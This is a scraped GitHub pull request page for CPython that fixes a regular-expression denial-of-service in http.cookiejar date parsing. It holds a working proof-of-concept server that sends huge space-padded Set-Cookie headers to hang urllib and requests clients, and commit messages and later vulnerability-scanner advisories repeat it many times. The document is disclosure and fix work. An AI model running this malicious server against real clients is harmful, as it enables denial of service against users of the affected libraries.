-
-
Notifications
You must be signed in to change notification settings - Fork 30.3k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
bpo-38804: Fix REDoS in http.cookiejar #17157
Conversation
The regex http.cookiejar.LOOSE_HTTP_DATE_RE was vulnerable to regular expression denial of service (REDoS). LOOSE_HTTP_DATE_RE.match is called when using http.cookiejar.CookieJar to parse Set-Cookie headers returned by a server. Processing a response from a malicious HTTP server can lead to extreme CPU usage and execution will be blocked for a long time. The regex contained multiple overlapping \s* capture groups. Ignoring the ?-optional capture groups the regex could be simplified to \d+-\w+-\d+(\s*\s*\s*)$ Therefore, a long sequence of spaces can trigger bad performance. Matching a malicious string such as LOOSE_HTTP_DATE_RE.match("1-c-1" + (" " * 2000) + "!") caused catastrophic backtracking. The fix removes ambiguity about which \s* should match a particular space. You can create a malicious server which responds with Set-Cookie headers to attack all python programs which access it e.g. from http.server import BaseHTTPRequestHandler, HTTPServer def make_set_cookie_value(n_spaces): spaces = " " * n_spaces expiry = f"1-c-1{spaces}!" return f"b;Expires={expiry}" class Handler(BaseHTTPRequestHandler): def do_GET(self): self.log_request(204) self.send_response_only(204) # Don't bother sending Server and Date n_spaces = ( int(self.path[1:]) # Can GET e.g. /100 to test shorter sequences if len(self.path) > 1 else 65506 # Max header line length 65536 ) value = make_set_cookie_value(n_spaces) for i in range(99): # Not necessary, but we can have up to 100 header lines self.send_header("Set-Cookie", value) self.end_headers() if __name__ == "__main__": HTTPServer(("", 44020), Handler).serve_forever() This server returns 99 Set-Cookie headers. Each has 65506 spaces. Extracting the cookies will pretty much never complete. Vulnerable client using the example at the bottom of https://docs.python.org/3/library/http.cookiejar.html : import http.cookiejar, urllib.request cj = http.cookiejar.CookieJar() opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj)) r = opener.open("http://localhost:44020/") The popular requests library was also vulnerable without any additional options (as it uses http.cookiejar by default): import requests requests.get("http://localhost:44020/")
Hello, and thanks for your contribution! I'm a bot set up to make sure that the project can legally accept this contribution by verifying everyone involved has signed the PSF contributor agreement (CLA). CLA MissingOur records indicate the following people have not signed the CLA: For legal reasons we need all the people listed to sign the CLA before we can look at your contribution. Please follow the steps outlined in the CPython devguide to rectify this issue. If you have recently signed the CLA, please wait at least one business day You can check yourself to see if the CLA has been received. Thanks again for the contribution, we look forward to reviewing it! |
Thanks for your time @bcaller, and welcome to CPython! I assume that you've seen the bot's message about the CLA? |
Yes @brandtbucher, I just signed it. |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
This PR should also have a NEWS entry. Something like:
Fixes a ReDoS vulnerability in :class:`http.cookiejar.CookieJar`.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Thanks @bcaller, this looks good to me now. I’m not an expert on this code though, so we’ll need to find somebody who is.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
LGTM. There is the same problem with ISO_DATE_RE
. Do you mind to fix it too?
Would be nice to add tests (if it is possible) -- some examples, which takes more than a hour with unpatched code and just a fraction of second with patched code.
I was thinking about the test, but how do I make a test which is reliable, regardless of CPU power and other processes running on the machine? I could make a test which measures the time for successively longer strings and asserts the performance is sub-quadratic? |
I think it is enough to use an example that takes long time (a hour or few hours). It will not pass unnoticed. |
I wrote an overcomplicated test def test_http2time_redos_regression(self):
def run_timer(n_spaces):
return timeit.timeit(
stmt="http2time(expires)",
number=5,
globals=dict(
http2time=http2time,
expires="1-c-1{}!".format(' ' * n_spaces),
),
)
base_n_spaces = 500
factor = 2 # Length of backtracking sequence is increased by this factor
long_time = run_timer(base_n_spaces * factor)
short_time = run_timer(base_n_spaces)
self.assertLess(
long_time / short_time, # Execution time increased by this factor
factor ** 1.2, # Expected to be approximately equal, but we can have some leeway
"Performance of http2time is significantly worse than linear",
) but I think I'll just do what you said instead. |
27ce2fd
to
60de955
Compare
Lib/test/test_http_cookiejar.py
Outdated
def test_http2time_redos_regression_actually_completes(self): | ||
# LOOSE_HTTP_DATE_RE was vulnerable to malicious input which caused catastrophic backtracking (REDoS). | ||
# If we regress, this test will take a very long time to succeed. | ||
http2time("1-c-1{}!".format(" " * 65506)) |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Would it be possible to use time.perf_counter() to detect if the function takes way too long? For example, test with 1 space, than test with 65K spaces, and test that the second test is not like 1000x slower?
In general, I dislike tests which rely on time, since they are likely to fail on our slowest buildbot. But I don't suggest to use hardcoded timing, only to compare timings of two function calls. It may work on buildbot, especially if the threshold is large enough (1000x slower? more?).
cc @pablogsal
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
With the fixed regex the test should take a fraction of second.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
@vstinner Do you mean something like the above #17157 (comment) ?
The issue here is whether we really should have a unit test for algorithmic complexity of a function at all and what it should look like. Do we do that anywhere else?
I agree that having the one-line test which never explicitly fails is a bit weird.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
http2time()
has cubic complexity, iso2time()
has quadratic complexity.
Lib/test/test_http_cookiejar.py
Outdated
def test_http2time_redos_regression_actually_completes(self): | ||
# LOOSE_HTTP_DATE_RE was vulnerable to malicious input which caused catastrophic backtracking (REDoS). | ||
# If we regress, this test will take a very long time to succeed. | ||
http2time("1-c-1{}!".format(" " * 65506)) |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
With the fixed regex the test should take a fraction of second.
60de955
to
2ea754f
Compare
If we regress, this test will take a very long time.
A string like "444444" + (" " * 2000) + "A" could cause poor performance due to the 2 overlapping \s* groups, although this is not as serious as the REDoS in LOOSE_HTTP_DATE_RE was.
2ea754f
to
e11dfbe
Compare
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Great! I see this is your first contribution. Do you mind to add also your name in Misc/ACKS?
Misc/NEWS.d/next/Security/2019-11-15-00-54-42.bpo-38804.vjbM8V.rst
Outdated
Show resolved
Hide resolved
The regex http.cookiejar.LOOSE_HTTP_DATE_RE was vulnerable to regular expression denial of service (REDoS). LOOSE_HTTP_DATE_RE.match is called when using http.cookiejar.CookieJar to parse Set-Cookie headers returned by a server. Processing a response from a malicious HTTP server can lead to extreme CPU usage and execution will be blocked for a long time. The regex contained multiple overlapping \s* capture groups. Ignoring the ?-optional capture groups the regex could be simplified to \d+-\w+-\d+(\s*\s*\s*)$ Therefore, a long sequence of spaces can trigger bad performance. Matching a malicious string such as LOOSE_HTTP_DATE_RE.match("1-c-1" + (" " * 2000) + "!") caused catastrophic backtracking. The fix removes ambiguity about which \s* should match a particular space. You can create a malicious server which responds with Set-Cookie headers to attack all python programs which access it e.g. from http.server import BaseHTTPRequestHandler, HTTPServer def make_set_cookie_value(n_spaces): spaces = " " * n_spaces expiry = f"1-c-1{spaces}!" return f"b;Expires={expiry}" class Handler(BaseHTTPRequestHandler): def do_GET(self): self.log_request(204) self.send_response_only(204) GH- Don't bother sending Server and Date n_spaces = ( int(self.path[1:]) GH- Can GET e.g. /100 to test shorter sequences if len(self.path) > 1 else 65506 GH- Max header line length 65536 ) value = make_set_cookie_value(n_spaces) for i in range(99): GH- Not necessary, but we can have up to 100 header lines self.send_header("Set-Cookie", value) self.end_headers() if __name__ == "__main__": HTTPServer(("", 44020), Handler).serve_forever() This server returns 99 Set-Cookie headers. Each has 65506 spaces. Extracting the cookies will pretty much never complete. Vulnerable client using the example at the bottom of https://docs.python.org/3/library/http.cookiejar.html : import http.cookiejar, urllib.request cj = http.cookiejar.CookieJar() opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj)) r = opener.open("http://localhost:44020/") The popular requests library was also vulnerable without any additional options (as it uses http.cookiejar by default): import requests requests.get("http://localhost:44020/") * Regression test for http.cookiejar REDoS If we regress, this test will take a very long time. * Improve performance of http.cookiejar.ISO_DATE_RE A string like "444444" + (" " * 2000) + "A" could cause poor performance due to the 2 overlapping \s* groups, although this is not as serious as the REDoS in LOOSE_HTTP_DATE_RE was. (cherry picked from commit 1b779bf) Co-authored-by: bcaller <bcaller@users.noreply.github.com>
I merged your PR, thanks. I'm ok to skip the automated test to measure the maximum time. I backported the fix to all supported Python branches: 2.7, 3.5, 3.6, 3.7 and 3.8. |
Congrats on your first CPython contribution @bcaller! 🍾 Looking forward to seeing more from you in the future. |
The regex http.cookiejar.LOOSE_HTTP_DATE_RE was vulnerable to regular expression denial of service (REDoS). LOOSE_HTTP_DATE_RE.match is called when using http.cookiejar.CookieJar to parse Set-Cookie headers returned by a server. Processing a response from a malicious HTTP server can lead to extreme CPU usage and execution will be blocked for a long time. The regex contained multiple overlapping \s* capture groups. Ignoring the ?-optional capture groups the regex could be simplified to \d+-\w+-\d+(\s*\s*\s*)$ Therefore, a long sequence of spaces can trigger bad performance. Matching a malicious string such as LOOSE_HTTP_DATE_RE.match("1-c-1" + (" " * 2000) + "!") caused catastrophic backtracking. The fix removes ambiguity about which \s* should match a particular space. You can create a malicious server which responds with Set-Cookie headers to attack all python programs which access it e.g. from http.server import BaseHTTPRequestHandler, HTTPServer def make_set_cookie_value(n_spaces): spaces = " " * n_spaces expiry = f"1-c-1{spaces}!" return f"b;Expires={expiry}" class Handler(BaseHTTPRequestHandler): def do_GET(self): self.log_request(204) self.send_response_only(204) GH- Don't bother sending Server and Date n_spaces = ( int(self.path[1:]) GH- Can GET e.g. /100 to test shorter sequences if len(self.path) > 1 else 65506 GH- Max header line length 65536 ) value = make_set_cookie_value(n_spaces) for i in range(99): GH- Not necessary, but we can have up to 100 header lines self.send_header("Set-Cookie", value) self.end_headers() if __name__ == "__main__": HTTPServer(("", 44020), Handler).serve_forever() This server returns 99 Set-Cookie headers. Each has 65506 spaces. Extracting the cookies will pretty much never complete. Vulnerable client using the example at the bottom of https://docs.python.org/3/library/http.cookiejar.html : import http.cookiejar, urllib.request cj = http.cookiejar.CookieJar() opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj)) r = opener.open("http://localhost:44020/") The popular requests library was also vulnerable without any additional options (as it uses http.cookiejar by default): import requests requests.get("http://localhost:44020/") * Regression test for http.cookiejar REDoS If we regress, this test will take a very long time. * Improve performance of http.cookiejar.ISO_DATE_RE A string like "444444" + (" " * 2000) + "A" could cause poor performance due to the 2 overlapping \s* groups, although this is not as serious as the REDoS in LOOSE_HTTP_DATE_RE was. (cherry picked from commit 1b779bf) Co-authored-by: bcaller <bcaller@users.noreply.github.com>
The regex http.cookiejar.LOOSE_HTTP_DATE_RE was vulnerable to regular expression denial of service (REDoS). LOOSE_HTTP_DATE_RE.match is called when using http.cookiejar.CookieJar to parse Set-Cookie headers returned by a server. Processing a response from a malicious HTTP server can lead to extreme CPU usage and execution will be blocked for a long time. The regex contained multiple overlapping \s* capture groups. Ignoring the ?-optional capture groups the regex could be simplified to \d+-\w+-\d+(\s*\s*\s*)$ Therefore, a long sequence of spaces can trigger bad performance. Matching a malicious string such as LOOSE_HTTP_DATE_RE.match("1-c-1" + (" " * 2000) + "!") caused catastrophic backtracking. The fix removes ambiguity about which \s* should match a particular space. You can create a malicious server which responds with Set-Cookie headers to attack all python programs which access it e.g. from http.server import BaseHTTPRequestHandler, HTTPServer def make_set_cookie_value(n_spaces): spaces = " " * n_spaces expiry = f"1-c-1{spaces}!" return f"b;Expires={expiry}" class Handler(BaseHTTPRequestHandler): def do_GET(self): self.log_request(204) self.send_response_only(204) GH- Don't bother sending Server and Date n_spaces = ( int(self.path[1:]) GH- Can GET e.g. /100 to test shorter sequences if len(self.path) > 1 else 65506 GH- Max header line length 65536 ) value = make_set_cookie_value(n_spaces) for i in range(99): GH- Not necessary, but we can have up to 100 header lines self.send_header("Set-Cookie", value) self.end_headers() if __name__ == "__main__": HTTPServer(("", 44020), Handler).serve_forever() This server returns 99 Set-Cookie headers. Each has 65506 spaces. Extracting the cookies will pretty much never complete. Vulnerable client using the example at the bottom of https://docs.python.org/3/library/http.cookiejar.html : import http.cookiejar, urllib.request cj = http.cookiejar.CookieJar() opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj)) r = opener.open("http://localhost:44020/") The popular requests library was also vulnerable without any additional options (as it uses http.cookiejar by default): import requests requests.get("http://localhost:44020/") * Regression test for http.cookiejar REDoS If we regress, this test will take a very long time. * Improve performance of http.cookiejar.ISO_DATE_RE A string like "444444" + (" " * 2000) + "A" could cause poor performance due to the 2 overlapping \s* groups, although this is not as serious as the REDoS in LOOSE_HTTP_DATE_RE was. (cherry picked from commit 1b779bf) Co-authored-by: bcaller <bcaller@users.noreply.github.com>
The regex http.cookiejar.LOOSE_HTTP_DATE_RE was vulnerable to regular expression denial of service (REDoS). LOOSE_HTTP_DATE_RE.match is called when using http.cookiejar.CookieJar to parse Set-Cookie headers returned by a server. Processing a response from a malicious HTTP server can lead to extreme CPU usage and execution will be blocked for a long time. The regex contained multiple overlapping \s* capture groups. Ignoring the ?-optional capture groups the regex could be simplified to \d+-\w+-\d+(\s*\s*\s*)$ Therefore, a long sequence of spaces can trigger bad performance. Matching a malicious string such as LOOSE_HTTP_DATE_RE.match("1-c-1" + (" " * 2000) + "!") caused catastrophic backtracking. The fix removes ambiguity about which \s* should match a particular space. You can create a malicious server which responds with Set-Cookie headers to attack all python programs which access it e.g. from http.server import BaseHTTPRequestHandler, HTTPServer def make_set_cookie_value(n_spaces): spaces = " " * n_spaces expiry = f"1-c-1{spaces}!" return f"b;Expires={expiry}" class Handler(BaseHTTPRequestHandler): def do_GET(self): self.log_request(204) self.send_response_only(204) GH- Don't bother sending Server and Date n_spaces = ( int(self.path[1:]) GH- Can GET e.g. /100 to test shorter sequences if len(self.path) > 1 else 65506 GH- Max header line length 65536 ) value = make_set_cookie_value(n_spaces) for i in range(99): GH- Not necessary, but we can have up to 100 header lines self.send_header("Set-Cookie", value) self.end_headers() if __name__ == "__main__": HTTPServer(("", 44020), Handler).serve_forever() This server returns 99 Set-Cookie headers. Each has 65506 spaces. Extracting the cookies will pretty much never complete. Vulnerable client using the example at the bottom of https://docs.python.org/3/library/http.cookiejar.html : import http.cookiejar, urllib.request cj = http.cookiejar.CookieJar() opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj)) r = opener.open("http://localhost:44020/") The popular requests library was also vulnerable without any additional options (as it uses http.cookiejar by default): import requests requests.get("http://localhost:44020/") * Regression test for http.cookiejar REDoS If we regress, this test will take a very long time. * Improve performance of http.cookiejar.ISO_DATE_RE A string like "444444" + (" " * 2000) + "A" could cause poor performance due to the 2 overlapping \s* groups, although this is not as serious as the REDoS in LOOSE_HTTP_DATE_RE was. (cherry picked from commit 1b779bf) Co-authored-by: bcaller <bcaller@users.noreply.github.com>
The regex http.cookiejar.LOOSE_HTTP_DATE_RE was vulnerable to regular expression denial of service (REDoS). LOOSE_HTTP_DATE_RE.match is called when using http.cookiejar.CookieJar to parse Set-Cookie headers returned by a server. Processing a response from a malicious HTTP server can lead to extreme CPU usage and execution will be blocked for a long time. The regex contained multiple overlapping \s* capture groups. Ignoring the ?-optional capture groups the regex could be simplified to \d+-\w+-\d+(\s*\s*\s*)$ Therefore, a long sequence of spaces can trigger bad performance. Matching a malicious string such as LOOSE_HTTP_DATE_RE.match("1-c-1" + (" " * 2000) + "!") caused catastrophic backtracking. The fix removes ambiguity about which \s* should match a particular space. You can create a malicious server which responds with Set-Cookie headers to attack all python programs which access it e.g. from http.server import BaseHTTPRequestHandler, HTTPServer def make_set_cookie_value(n_spaces): spaces = " " * n_spaces expiry = f"1-c-1{spaces}!" return f"b;Expires={expiry}" class Handler(BaseHTTPRequestHandler): def do_GET(self): self.log_request(204) self.send_response_only(204) # Don't bother sending Server and Date n_spaces = ( int(self.path[1:]) # Can GET e.g. /100 to test shorter sequences if len(self.path) > 1 else 65506 # Max header line length 65536 ) value = make_set_cookie_value(n_spaces) for i in range(99): # Not necessary, but we can have up to 100 header lines self.send_header("Set-Cookie", value) self.end_headers() if __name__ == "__main__": HTTPServer(("", 44020), Handler).serve_forever() This server returns 99 Set-Cookie headers. Each has 65506 spaces. Extracting the cookies will pretty much never complete. Vulnerable client using the example at the bottom of https://docs.python.org/3/library/http.cookiejar.html : import http.cookiejar, urllib.request cj = http.cookiejar.CookieJar() opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj)) r = opener.open("http://localhost:44020/") The popular requests library was also vulnerable without any additional options (as it uses http.cookiejar by default): import requests requests.get("http://localhost:44020/") * Regression test for http.cookiejar REDoS If we regress, this test will take a very long time. * Improve performance of http.cookiejar.ISO_DATE_RE A string like "444444" + (" " * 2000) + "A" could cause poor performance due to the 2 overlapping \s* groups, although this is not as serious as the REDoS in LOOSE_HTTP_DATE_RE was. (cherry picked from commit 1b779bf)
|
|
The regex http.cookiejar.LOOSE_HTTP_DATE_RE was vulnerable to regular expression denial of service (REDoS). LOOSE_HTTP_DATE_RE.match is called when using http.cookiejar.CookieJar to parse Set-Cookie headers returned by a server. Processing a response from a malicious HTTP server can lead to extreme CPU usage and execution will be blocked for a long time. The regex contained multiple overlapping \s* capture groups. Ignoring the ?-optional capture groups the regex could be simplified to \d+-\w+-\d+(\s*\s*\s*)$ Therefore, a long sequence of spaces can trigger bad performance. Matching a malicious string such as LOOSE_HTTP_DATE_RE.match("1-c-1" + (" " * 2000) + "!") caused catastrophic backtracking. The fix removes ambiguity about which \s* should match a particular space. You can create a malicious server which responds with Set-Cookie headers to attack all python programs which access it e.g. from http.server import BaseHTTPRequestHandler, HTTPServer def make_set_cookie_value(n_spaces): spaces = " " * n_spaces expiry = f"1-c-1{spaces}!" return f"b;Expires={expiry}" class Handler(BaseHTTPRequestHandler): def do_GET(self): self.log_request(204) self.send_response_only(204) # Don't bother sending Server and Date n_spaces = ( int(self.path[1:]) # Can GET e.g. /100 to test shorter sequences if len(self.path) > 1 else 65506 # Max header line length 65536 ) value = make_set_cookie_value(n_spaces) for i in range(99): # Not necessary, but we can have up to 100 header lines self.send_header("Set-Cookie", value) self.end_headers() if __name__ == "__main__": HTTPServer(("", 44020), Handler).serve_forever() This server returns 99 Set-Cookie headers. Each has 65506 spaces. Extracting the cookies will pretty much never complete. Vulnerable client using the example at the bottom of https://docs.python.org/3/library/http.cookiejar.html : import http.cookiejar, urllib.request cj = http.cookiejar.CookieJar() opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj)) r = opener.open("http://localhost:44020/") The popular requests library was also vulnerable without any additional options (as it uses http.cookiejar by default): import requests requests.get("http://localhost:44020/") * Regression test for http.cookiejar REDoS If we regress, this test will take a very long time. * Improve performance of http.cookiejar.ISO_DATE_RE A string like "444444" + (" " * 2000) + "A" could cause poor performance due to the 2 overlapping \s* groups, although this is not as serious as the REDoS in LOOSE_HTTP_DATE_RE was.
The regex http.cookiejar.LOOSE_HTTP_DATE_RE was vulnerable to regular expression denial of service (REDoS). LOOSE_HTTP_DATE_RE.match is called when using http.cookiejar.CookieJar to parse Set-Cookie headers returned by a server. Processing a response from a malicious HTTP server can lead to extreme CPU usage and execution will be blocked for a long time. The regex contained multiple overlapping \s* capture groups. Ignoring the ?-optional capture groups the regex could be simplified to \d+-\w+-\d+(\s*\s*\s*)$ Therefore, a long sequence of spaces can trigger bad performance. Matching a malicious string such as LOOSE_HTTP_DATE_RE.match("1-c-1" + (" " * 2000) + "!") caused catastrophic backtracking. The fix removes ambiguity about which \s* should match a particular space. You can create a malicious server which responds with Set-Cookie headers to attack all python programs which access it e.g. from http.server import BaseHTTPRequestHandler, HTTPServer def make_set_cookie_value(n_spaces): spaces = " " * n_spaces expiry = f"1-c-1{spaces}!" return f"b;Expires={expiry}" class Handler(BaseHTTPRequestHandler): def do_GET(self): self.log_request(204) self.send_response_only(204) # Don't bother sending Server and Date n_spaces = ( int(self.path[1:]) # Can GET e.g. /100 to test shorter sequences if len(self.path) > 1 else 65506 # Max header line length 65536 ) value = make_set_cookie_value(n_spaces) for i in range(99): # Not necessary, but we can have up to 100 header lines self.send_header("Set-Cookie", value) self.end_headers() if __name__ == "__main__": HTTPServer(("", 44020), Handler).serve_forever() This server returns 99 Set-Cookie headers. Each has 65506 spaces. Extracting the cookies will pretty much never complete. Vulnerable client using the example at the bottom of https://docs.python.org/3/library/http.cookiejar.html : import http.cookiejar, urllib.request cj = http.cookiejar.CookieJar() opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj)) r = opener.open("http://localhost:44020/") The popular requests library was also vulnerable without any additional options (as it uses http.cookiejar by default): import requests requests.get("http://localhost:44020/") * Regression test for http.cookiejar REDoS If we regress, this test will take a very long time. * Improve performance of http.cookiejar.ISO_DATE_RE A string like "444444" + (" " * 2000) + "A" could cause poor performance due to the 2 overlapping \s* groups, although this is not as serious as the REDoS in LOOSE_HTTP_DATE_RE was.
The regex http.cookiejar.LOOSE_HTTP_DATE_RE was vulnerable to regular expression denial of service (REDoS). LOOSE_HTTP_DATE_RE.match is called when using http.cookiejar.CookieJar to parse Set-Cookie headers returned by a server. Processing a response from a malicious HTTP server can lead to extreme CPU usage and execution will be blocked for a long time. The regex contained multiple overlapping \s* capture groups. Ignoring the ?-optional capture groups the regex could be simplified to \d+-\w+-\d+(\s*\s*\s*)$ Therefore, a long sequence of spaces can trigger bad performance. Matching a malicious string such as LOOSE_HTTP_DATE_RE.match("1-c-1" + (" " * 2000) + "!") caused catastrophic backtracking. The fix removes ambiguity about which \s* should match a particular space. You can create a malicious server which responds with Set-Cookie headers to attack all python programs which access it e.g. from http.server import BaseHTTPRequestHandler, HTTPServer def make_set_cookie_value(n_spaces): spaces = " " * n_spaces expiry = f"1-c-1{spaces}!" return f"b;Expires={expiry}" class Handler(BaseHTTPRequestHandler): def do_GET(self): self.log_request(204) self.send_response_only(204) # Don't bother sending Server and Date n_spaces = ( int(self.path[1:]) # Can GET e.g. /100 to test shorter sequences if len(self.path) > 1 else 65506 # Max header line length 65536 ) value = make_set_cookie_value(n_spaces) for i in range(99): # Not necessary, but we can have up to 100 header lines self.send_header("Set-Cookie", value) self.end_headers() if __name__ == "__main__": HTTPServer(("", 44020), Handler).serve_forever() This server returns 99 Set-Cookie headers. Each has 65506 spaces. Extracting the cookies will pretty much never complete. Vulnerable client using the example at the bottom of https://docs.python.org/3/library/http.cookiejar.html : import http.cookiejar, urllib.request cj = http.cookiejar.CookieJar() opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj)) r = opener.open("http://localhost:44020/") The popular requests library was also vulnerable without any additional options (as it uses http.cookiejar by default): import requests requests.get("http://localhost:44020/") * Regression test for http.cookiejar REDoS If we regress, this test will take a very long time. * Improve performance of http.cookiejar.ISO_DATE_RE A string like "444444" + (" " * 2000) + "A" could cause poor performance due to the 2 overlapping \s* groups, although this is not as serious as the REDoS in LOOSE_HTTP_DATE_RE was. (cherry picked from commit 1b779bf) Co-authored-by: bcaller <bcaller@users.noreply.github.com>
The regex http.cookiejar.LOOSE_HTTP_DATE_RE was vulnerable to regular expression denial of service (REDoS). The regex contained multiple overlapping \s* capture groups. A long sequence of spaces can trigger bad performance. See python/cpython#17157 and https://pyup.io/posts/pyup-discovers-redos-vulnerabilities-in-top-python-packages/
Future 0.18.2 and earlier allows remote attackers to cause a denial of service via crafted Set-Cookie header from malicious web server. https://github.com/PythonCharmers/python-future/blob/master/src/future/backports/http/cookiejar.py#L215 python/cpython#17157
52510: future <=0.18.2 resolved (0.16.0 installed)! Future 0.18.2 and earlier allows remote attackers to cause a denial of service via crafted Set-Cookie header from malicious web server. https://github.com/PythonCharmers/python-future/blob/master/src/future/backports/http/cookiejar.py#L215 python/cpython#17157 55261: flask <2.2.5 resolved (2.0.2 installed)! Flask 2.2.5 and 2.3.2 include a fix for CVE-2023-30861: When all of the following conditions are met, a response containing data intended for one client may be cached and subsequently sent by the proxy to other clients. If the proxy also caches 'Set-Cookie' headers, it may send one client's 'session' cookie to other clients. The severity depends on the application's use of the session and the proxy's behavior regarding cookies. The risk depends on all these conditions being met: 1. The application must be hosted behind a caching proxy that does not strip cookies or ignore responses with cookies. 2. The application sets 'session.permanent = True' 3. The application does not access or modify the session at any point during a request. 4. 'SESSION_REFRESH_EACH_REQUEST' enabled (the default). 5. The application does not set a 'Cache-Control' header to indicate that a page is private or should not be cached. This happens because vulnerable versions of Flask only set the 'Vary: Cookie' header when the session is accessed or modified, not when it is refreshed (re-sent to update the expiration) without being accessed or modified. GHSA-m2qf-hxjv-5gpq
Future 0.18.2 and earlier allows remote attackers to cause a denial of service via crafted Set-Cookie header from malicious web server. https://github.com/PythonCharmers/python-future/blob/master/src/future/backports/http/cookiejar.py#L215 python/cpython#17157
52510: future <=0.18.2 resolved (0.16.0 installed)! Future 0.18.2 and earlier allows remote attackers to cause a denial of service via crafted Set-Cookie header from malicious web server. https://github.com/PythonCharmers/python-future/blob/master/src/future/backports/http/cookiejar.py#L215 python/cpython#17157 55261: flask <2.2.5 resolved (2.0.2 installed)! Flask 2.2.5 and 2.3.2 include a fix for CVE-2023-30861: When all of the following conditions are met, a response containing data intended for one client may be cached and subsequently sent by the proxy to other clients. If the proxy also caches 'Set-Cookie' headers, it may send one client's 'session' cookie to other clients. The severity depends on the application's use of the session and the proxy's behavior regarding cookies. The risk depends on all these conditions being met: 1. The application must be hosted behind a caching proxy that does not strip cookies or ignore responses with cookies. 2. The application sets 'session.permanent = True' 3. The application does not access or modify the session at any point during a request. 4. 'SESSION_REFRESH_EACH_REQUEST' enabled (the default). 5. The application does not set a 'Cache-Control' header to indicate that a page is private or should not be cached. This happens because vulnerable versions of Flask only set the 'Vary: Cookie' header when the session is accessed or modified, not when it is refreshed (re-sent to update the expiration) without being accessed or modified. GHSA-m2qf-hxjv-5gpq
Future 0.18.2 and earlier allows remote attackers to cause a denial of service via crafted Set-Cookie header from malicious web server. https://github.com/PythonCharmers/python-future/blob/master/src/future/backports/http/cookiejar.py#L215 python/cpython#17157
52510: future <=0.18.2 resolved (0.16.0 installed)! Future 0.18.2 and earlier allows remote attackers to cause a denial of service via crafted Set-Cookie header from malicious web server. https://github.com/PythonCharmers/python-future/blob/master/src/future/backports/http/cookiejar.py#L215 python/cpython#17157 55261: flask <2.2.5 resolved (2.0.2 installed)! Flask 2.2.5 and 2.3.2 include a fix for CVE-2023-30861: When all of the following conditions are met, a response containing data intended for one client may be cached and subsequently sent by the proxy to other clients. If the proxy also caches 'Set-Cookie' headers, it may send one client's 'session' cookie to other clients. The severity depends on the application's use of the session and the proxy's behavior regarding cookies. The risk depends on all these conditions being met: 1. The application must be hosted behind a caching proxy that does not strip cookies or ignore responses with cookies. 2. The application sets 'session.permanent = True' 3. The application does not access or modify the session at any point during a request. 4. 'SESSION_REFRESH_EACH_REQUEST' enabled (the default). 5. The application does not set a 'Cache-Control' header to indicate that a page is private or should not be cached. This happens because vulnerable versions of Flask only set the 'Vary: Cookie' header when the session is accessed or modified, not when it is refreshed (re-sent to update the expiration) without being accessed or modified. GHSA-m2qf-hxjv-5gpq
Future 0.18.2 and earlier allows remote attackers to cause a denial of service via crafted Set-Cookie header from malicious web server. https://github.com/PythonCharmers/python-future/blob/master/src/future/backports/http/cookiejar.py#L215 python/cpython#17157
52510: future <=0.18.2 resolved (0.16.0 installed)! Future 0.18.2 and earlier allows remote attackers to cause a denial of service via crafted Set-Cookie header from malicious web server. https://github.com/PythonCharmers/python-future/blob/master/src/future/backports/http/cookiejar.py#L215 python/cpython#17157 55261: flask <2.2.5 resolved (2.0.2 installed)! Flask 2.2.5 and 2.3.2 include a fix for CVE-2023-30861: When all of the following conditions are met, a response containing data intended for one client may be cached and subsequently sent by the proxy to other clients. If the proxy also caches 'Set-Cookie' headers, it may send one client's 'session' cookie to other clients. The severity depends on the application's use of the session and the proxy's behavior regarding cookies. The risk depends on all these conditions being met: 1. The application must be hosted behind a caching proxy that does not strip cookies or ignore responses with cookies. 2. The application sets 'session.permanent = True' 3. The application does not access or modify the session at any point during a request. 4. 'SESSION_REFRESH_EACH_REQUEST' enabled (the default). 5. The application does not set a 'Cache-Control' header to indicate that a page is private or should not be cached. This happens because vulnerable versions of Flask only set the 'Vary: Cookie' header when the session is accessed or modified, not when it is refreshed (re-sent to update the expiration) without being accessed or modified. GHSA-m2qf-hxjv-5gpq
52510: future <=0.18.2 resolved (0.16.0 installed)! Future 0.18.2 and earlier allows remote attackers to cause a denial of service via crafted Set-Cookie header from malicious web server. https://github.com/PythonCharmers/python-future/blob/master/src/future/backports/http/cookiejar.py#L215 python/cpython#17157 55261: flask <2.2.5 resolved (2.0.2 installed)! Flask 2.2.5 and 2.3.2 include a fix for CVE-2023-30861: When all of the following conditions are met, a response containing data intended for one client may be cached and subsequently sent by the proxy to other clients. If the proxy also caches 'Set-Cookie' headers, it may send one client's 'session' cookie to other clients. The severity depends on the application's use of the session and the proxy's behavior regarding cookies. The risk depends on all these conditions being met: 1. The application must be hosted behind a caching proxy that does not strip cookies or ignore responses with cookies. 2. The application sets 'session.permanent = True' 3. The application does not access or modify the session at any point during a request. 4. 'SESSION_REFRESH_EACH_REQUEST' enabled (the default). 5. The application does not set a 'Cache-Control' header to indicate that a page is private or should not be cached. This happens because vulnerable versions of Flask only set the 'Vary: Cookie' header when the session is accessed or modified, not when it is refreshed (re-sent to update the expiration) without being accessed or modified. 